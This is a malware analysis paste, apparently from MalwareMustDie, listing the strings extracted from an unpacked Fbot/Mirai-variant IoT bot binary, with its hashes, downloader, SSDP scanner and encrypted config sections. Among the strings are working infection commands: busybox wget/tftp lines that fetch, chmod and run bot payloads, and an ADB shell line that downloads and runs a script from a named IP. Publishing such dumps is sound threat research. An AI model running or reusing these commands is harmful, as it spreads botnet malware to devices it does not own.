MalwareMustDie

The unpacked binary strings of recent Fbot binary

Feb 23rd, 2020
The unpacked binary strings of recent Fbot binary
bot.x86_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV),
            statically linked, stripped
MD5 (bot.x86_64) = ae975a5cdd9fb816a1e286e1a24d9144
SHA1 (bot.x86_64) = a56595c303a1dd391c834f0a788f4cf1a9857c1e
31244 Feb 23 20:09 bot.x86_64*

Dumped by @unixfreaxjp with "strings" - MalwareMustDie, NPO - malwaremustdie.org


---- strings start--------
9xsspnvgc8aj5pi7m28p
x86_64
aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
GET /bot.x86_64 HTTP/1.0
aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
/bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
/bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
\x%02x
enable
system
linuxshell
development
iptables -F
/bin/busybox FBOT
/bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
/bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
/bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
arm5
mips
mipsel
get: applet not found
ftp: applet not found
/bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
cho: applet not found
/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
retrieve
/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
./retrieve; ./.t telnet; >retrieve; >.t
ECHODONE
9xsspnvgc8aj5pi7m28p
/var/
/dev/
C H+C(L9
[]A\A]
SHH9
Z[]A\A]
C8H9C(v
9xsspnvgc8aj5pi7m28p
x86_64
aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
GET /bot.x86_64 HTTP/1.0
aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
/bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
/bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
\x%02x
enable
system
linuxshell
development
iptables -F
/bin/busybox FBOT
/bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
/bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
/bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
arm5
mips
mipsel
get: applet not found
ftp: applet not found
/bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
cho: applet not found
/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
retrieve
/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
./retrieve; ./.t telnet; >retrieve; >.t
ECHODONE
9xsspnvgc8aj5pi7m28p
/var/
/dev/
/mnt/
/var/run/
/var/tmp/
/dev/netslink/
SHH9
Z[]A\A]
C8H9C(v
9xsspnvgc8aj5pi7m28p
x86_64
x86_64
aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
GET /bot.x86_64 HTTP/1.0
aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
/bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
/bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
\x%02x
enable
system
linuxshell
development
iptables -F
/bin/busybox FBOT
/bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
/bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
/bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
arm5
mips
mipsel
get: applet not found
ftp: applet not found
/bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
cho: applet not found
/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
retrieve
/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
./retrieve; ./.t telnet; >retrieve; >.t
ECHODONE
9xsspnvgc8aj5pi7m28p
/var/
/dev/
/mnt/
/var/run/
/var/tmp/
/dev/netslink/
/dev/shm/
/bin/
/etc/
/boot/
/usr/
/sys/
arm4
arm6
arm7
nvalid
ailed
ncorrect
enied
rror
oodbye
ogin
sername
vrdvs
ccount
enter
assword
usybox
ulti-call
help
CNXN
host::features=cmd,shell_v2
OPENX
RPSW
[^_]
UWVS
[^_]=
---------embedded downloader-part--------
MIRAI
GET /bot/bot.x86 HTTP/1.0
.shstrtab
.text
.rodata
.bss
  !'
 !'
mips
MIRAI
GET /bot/bot.mips HTTP/1.0
.shstrtab
.text
.rodata
.got
.bss
.mdebug.abi32
mipsel
MIRAI
GET /bot/bot.mipsel HTTP/1.0
.shstrtab
.text
.rodata
.got
.bss
.mdebug.abi32
arm5
MIRAI
GET /bot/bot.arm5 HTTP/1.0
aeabi
.shstrtab
.text
.rodata
.got
.bss
.ARM.attributes
arm7
MIRAI
GET /bot/bot.arm7 HTTP/1.0
aeabi
.shstrtab
.text
.rodata
.got
.bss
.ARM.attributes
---------end of embedded downloader-part--------

---------SSDP-scanner-------
Host:
M-SEARCH * HTTP/1.1
Host:239.255.255.250:1900
ST:ssdp:all
Man:"ssdp:discover"
MX:3
stats
objectClass0
        _services
_dns-sd
_udp
local
----------end of SSDP------



abcdefghijklmnopqrstuvwxyz0123456789
------crypted-config------------
vte1
a~be1
r^__TREX^_
ZTTA
P]XGT1
AC^R
BT]W
TIT1
AC^R
ERA1
AC^R
RFU1
UPEP
]^RP]
dBTC
pVT_E
|^KX]]P
|PRX_E^BY
x_ET]
pAA]TfTSzXE
zye|}
]XZT
vTRZ^
rYC^\T
bPWPCX
|^KX]]P
fX_U^FB
pAA]TfTSzXE
zye|}
]XZT
vTRZ^
rYC^\T
bPWPCX
|^KX]]P
fX_U^FB
pAA]TfTSzXE
zye|}
]XZT
vTRZ^
rYC^\T
bPWPCX
|^KX]]P
fX_U^FB
fX_U^FB
pAA]TfTSzXE
zye|}
]XZT
vTRZ^
rYC^\T
bPWPCX
yeea
--------- end of crypted config-----------------
/dev/null
 !#$$%%&&''(((())))****++++,,,,,,,,--------........////////
__vdso_clock_gettime
LINUX_2.6
 !"#
!"#
-0X+0X 0X-0x+0x 0x
-+   0X0x
(null)
0123456789ABCDEF
M(knN
---------GCC msgs------------
Illegal byte sequence
Domain error
Result not representable
Not a tty
Permission denied
Operation not permitted
No such file or directory
No such process
File exists
Value too large for data type
No space left on device
Out of memory
Resource busy
Interrupted system call
Resource temporarily unavailable
Invalid seek
Cross-device link
Read-only file system
Directory not empty
Connection reset by peer
Operation timed out
Connection refused
Host is down
Host is unreachable
Address in use
Broken pipe
I/O error
No such device or address
Block device required
No such device
Not a directory
Is a directory
Text file busy
Exec format error
Invalid argument
Argument list too long
Symbolic link loop
Filename too long
Too many open files in system
No file descriptors available
Bad file descriptor
No child process
Bad address
File too large
Too many links
No locks available
Resource deadlock would occur
State not recoverable
Previous owner died
Operation canceled
Function not implemented
No message of desired type
Identifier removed
Device not a stream
No data available

---------- end of strings---------

Research material of malwaremustdie.org, Feb 2020
@unixfreaxjp